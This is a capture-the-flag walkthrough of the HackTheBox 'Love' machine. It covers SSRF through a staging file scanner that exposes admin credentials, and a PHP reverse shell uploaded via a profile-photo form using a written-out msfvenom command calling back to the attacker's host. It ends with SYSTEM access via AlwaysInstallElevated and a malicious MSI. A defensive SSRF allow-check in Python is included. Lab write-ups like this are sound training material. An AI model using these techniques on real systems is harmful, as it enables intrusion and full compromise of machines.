HackTheBox – Love

IP: 10.10.10.239

Link: https://app.hackthebox.eu/machines/Love

Enumeration

Port Scan

Notably, we appear to have 3 web servers running, all on PHP v7.3.27, and a MariaDB server on port 3306.

The server on port 5000 and the self-signed HTTPS server on port 443 both return a 403 Forbidden when we try to access them.

The web server on port 80 takes us to a login form that submits to /login.php.

the main page of the server on port 80

Knowing we also have a MariaDB server running, I am going to see if we can perform any SQL injection.

The endpoint accepts a POST request with the fields voter, password and login. In my case, login is left empty.

Passing a SQL injection payload to both fields with curl, I get an odd error when both fields are injected at once:

This error does reveal where the website's files are stored on the server itself.

If we just test things on the main UI, we get an error saying it "cannot find the id", so we may be able to brute-force a valid ID and then use SQL injection for the password.

It's also worth noting that there seems to be access control on the database that blocks our IP from connecting:

I performed a gobuster scan and discovered several directories with directory listing enabled. The most interesting one to me is /includes/, which seems to be where the PHP files included by the app live.

gobuster results
/includes

Next, I investigated the servers on port 443 and port 5000. The former presents a TLS certificate, and inspecting it shows that it was issued for the domain staging.love.htb by [email protected]:

Trying to access either site gives us a 403 Forbidden error. My assumption is that we need to get the HTTPS virtual host working by using our hosts file to point the proper domain at the box.

Doing so, by adding 10.10.10.239 staging.love.htb to the /etc/hosts file, grants us a new website:

file scanner

The demo page has a form where we can submit a URL to scan. I tried several different inputs, and it turns out we can pass the loopback address 127.0.0.1 in the URL, because this app runs on the same machine as the servers on port 80 and port 5000. Pointing it at port 80 shows an iframe of the voter login page:

iFrame of the server on port 80

However, most importantly, pointing it at the server on port 5000 gets around the 403 Forbidden error and gives us admin credentials!

Password manager on port 5000
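The file scanner above is a server-side request forgery: it fetches whatever URL it is given on the server's behalf, loopback included, which is how the 403 on port 5000 was bypassed. As an added example, not code from the box or from the original post, here is a Python allow-check a defender would place in front of such a fetcher; the function names, the injectable resolver and the sample URLs are my own assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical pre-fetch check for a "scan this URL" feature like the
# staging site's file scanner: refuse any target that lands on loopback,
# private or otherwise internal address space (e.g. the admin app on :5000).

ALLOWED_SCHEMES = {"http", "https"}


def _is_internal(ip):
    """True for any address that must never be fetched on a user's behalf."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def _default_resolver(host):
    """Resolve a hostname to every A/AAAA record it has (as strings)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_safe_scan_target(url, resolver=_default_resolver):
    """Return True only if every address the URL can reach is public.

    The resolver is injectable so the check can be exercised offline. In a
    real fetcher the resolved addresses must also be pinned for the actual
    connection (and re-checked on every redirect), otherwise a DNS answer
    can change between the check and the use.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return False               # file://, gopher:// etc. are never fetched
    host = parts.hostname          # urlsplit strips the [] of IPv6 literals
    try:
        addrs = [str(ipaddress.ip_address(host))]   # literal IP, no DNS needed
    except ValueError:
        try:                       # covers names and odd forms like 0x7f000001,
            addrs = resolver(host)  # which the resolver turns into 127.0.0.1
        except (socket.gaierror, OSError):
            return False           # unresolvable: fail closed
    if not addrs:
        return False
    return all(not _is_internal(ipaddress.ip_address(a)) for a in addrs)


if __name__ == "__main__":
    # Constructed sample targets, as the scanner on this box would receive them.
    for target in ("http://127.0.0.1:5000/", "http://93.184.216.34/"):
        print(target, "->", "allowed" if is_safe_scan_target(target) else "blocked")
```

The check alone does not close the hole if the fetcher follows redirects to a different host, so the same test has to run on each hop.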

Gobuster also found an /admin page that looks almost identical to the main login, except that it takes a username and password instead of a voter ID and password. Supplying these credentials grants us access to the admin dashboard.

admin dashboard

Gaining Reverse Shell

I browsed around the dashboard but everything is blank. What immediately stood out to me is that the admin in the top right has a profile picture. Clicking on it allows us to upload a photo to the profile.

upload modal

We can use this to try to upload a reverse shell. I will use msfvenom to craft a payload; msfvenom -l payloads lists the available ones. We also know the target is Windows, so I am going to try the php/meterpreter/reverse_tcp payload, since the server runs PHP.

Next, I opened a new terminal to listen on port 4444, and generated the payload using:

msfvenom -p php/meterpreter/reverse_tcp LHOST=<my-ip> -f raw > shell.php

I then fired up msfconsole and ran use /exploit/multi/handler. Unfortunately, every time the page loads, the session just ends, so it seems this shell will not work for us. I did some searching and found another shell with a neat UI called qs-php-backdoor.php, and this one lets us in:

reverse shell

I used the directory browser to find the user flag on Phoebe's desktop. Next we need to gain more access to get root.

Privilege Escalation

Using the execute shell command from above, I pasted a powershell reverse shell from here. I still had my meterpreter listener running in the background from earlier, so it immediately picked it up.

I attempted to upgrade this to a meterpreter shell but it failed. Next I found a script that looks for privilege escalation vectors here. I loaded it onto the machine and ran it. We have 4 non-default Windows services, one recently installed update (KB4589212), AlwaysInstallElevated registry keys (meaning MSI files may be run with SYSTEM privileges), 2 hijackable DLLs, among some other things.


AlwaysInstallElevated is what immediately stands out as the next point of attack. I crafted a new MSI payload with msfvenom and uploaded it to the server.

I used the shell command from the PHP backdoor again to launch this MSI, and it connected back to meterpreter:

And now we are running as system:

Now I just ran a series of commands to drop into a shell and check the Administrator's desktop for the root flag:

shell
whoami
cd ../../Users/Administrator/Desktop
dir
more root.txt
